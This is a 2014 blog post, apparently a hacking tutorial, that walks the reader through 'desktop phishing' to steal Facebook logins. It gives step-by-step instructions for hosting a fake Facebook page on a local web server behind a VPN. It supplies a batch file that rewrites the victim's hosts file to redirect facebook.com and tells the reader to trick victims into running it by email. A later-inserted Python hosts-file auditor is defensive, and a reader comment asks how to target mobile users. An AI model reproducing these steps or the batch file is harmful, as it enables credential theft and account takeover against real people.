
Sunday, 6 April 2014

Desktop Phishing - New art of phishing!!


Introduction:
In my last tutorial on hacking Facebook accounts via phishing, many users complained that they were facing problems with hosting websites, i.e. they were getting banned. So I decided to write an article on desktop phishing, which is a sophisticated trick to avoid hosting sites. It is a somewhat advanced way of phishing, so before this I would recommend you go through my previous post on hacking Facebook via phishing.

What is desktop phishing?
It is a type of phishing attack in which you do not have to host your phishing files on any free hosting site; instead, your computer or laptop acts as the server. In desktop phishing the attacker exploits the hosts file. The hosts file is a text file in which domains are mapped to their IP addresses. The operating system consults it before DNS, so it controls how your browser finds websites. For example:

74.125.236.84  www.facebook.com

We have used this IP address to map the domain www.facebook.com. Now, whenever the user types www.facebook.com, instead of reaching Facebook he is sent to the website at this IP address (74.125.236.84), which belongs to google.com.
Using this concept, the attacker will try to modify the victim's hosts file in the same way.
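
A defender's check for the hosts-file override described above, as an added example that is not part of the original post: it parses hosts-file text and flags every entry that pins a watched domain to a local address. The watch list, the function names and the sample entries (documentation-range IP addresses) are assumptions made for illustration.

```python
import ipaddress

# Assumed watch list: domains that should always resolve through DNS.
WATCHED = {"facebook.com", "google.com"}

def parse_hosts(text):
    """Yield (line_no, ip, hostname) for each valid mapping in hosts-file text."""
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # malformed address, resolver ignores it
        for name in fields[1:]:                  # one address may carry several names
            yield no, ip, name.lower().rstrip(".")

def is_watched(name):
    return any(name == d or name.endswith("." + d) for d in WATCHED)

def audit(text):
    """Return findings for watched domains that are overridden locally."""
    findings = []
    for no, ip, name in parse_hosts(text):
        if not is_watched(name):
            continue
        # Loopback / 0.0.0.0 entries are usually blocking, not redirection.
        sinkhole = ip.is_loopback or ip.is_unspecified
        findings.append({"line": no, "host": name, "ip": str(ip),
                         "severity": "info" if sinkhole else "high"})
    return findings

# Constructed sample hosts file (not taken from a real machine).
SAMPLE = "\n".join([
    "# constructed sample",
    "127.0.0.1 localhost",
    "203.0.113.10 www.facebook.com   # line appended by an untrusted script",
    "0.0.0.0 ads.google.com",
    "198.51.100.7 intranet.example",
    "not-an-ip www.facebook.com",
])

if __name__ == "__main__":
    for f in audit(SAMPLE):
        print(f"{f['severity']:5} line {f['line']}: {f['host']} -> {f['ip']}")
```

On a Windows host, pass the contents of C:\windows\system32\drivers\etc\hosts to audit(); any "high" finding means a watched domain is being answered from the hosts file instead of DNS.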

Prerequisite:

1. Phisher Page - You can download Facebook Phisher page from Here

2. Web server - You can use WAMP or XAMPP; I would recommend XAMPP.

3. A static VPN - I will use proXPN VPN for this tutorial, but I recommend Strong Open VPN as it is very stable.


Procedure:

1. First download and install XAMPP on your PC, then start the Apache and MySQL services.




2. Download the Facebook phisher page from the link given above and place all its contents in the htdocs folder; if there are files already in that folder, delete them all. You will find htdocs under XAMPP (C:\xampp\htdocs).




3. Install proXPN VPN or any other static VPN. I recommend Strong Vpn as it is very stable and gives you a static IP. Once you install and run it, you will get a static IP (VPN).




4. Now we have to replace some text in the victim's hosts file, which is at C:\windows\system32\drivers\etc. You can do this in many ways, either with an SFX archive or with a batch file; for this tutorial we will use a batch file to accomplish the job.

5. Open Notepad and paste the following code:

@echo off
echo 172.X.XX.X.X www.facebook.com >> C:\windows\system32\drivers\etc\hosts
exit

Replace "172.X.XX.X.X" with your IP (VPN) address, and then save it as Something.bat.

6. Now send the file via email or upload it to a site and ask the victim to download it. After the victim downloads and clicks the file, his hosts file will be modified. So now whenever the victim enters facebook.com he will be redirected to our phisher page, but the URL will remain Facebook.com.

Result:

  • Now when the victim accesses facebook.com, instead of landing on Facebook he is redirected to our Facebook phishing page, and after he inputs his credentials, just as in ordinary phishing, his account is compromised.





  • You will receive all his credentials in the log file placed in the htdocs folder.




Conclusion:
If you have any query regarding this post, mention it in the comments below and I will try to sort it out.
Take care, see you next time.

1 comment:

  1. Does it work for mobile devices? How to hack mobile users? And does it work in WAN?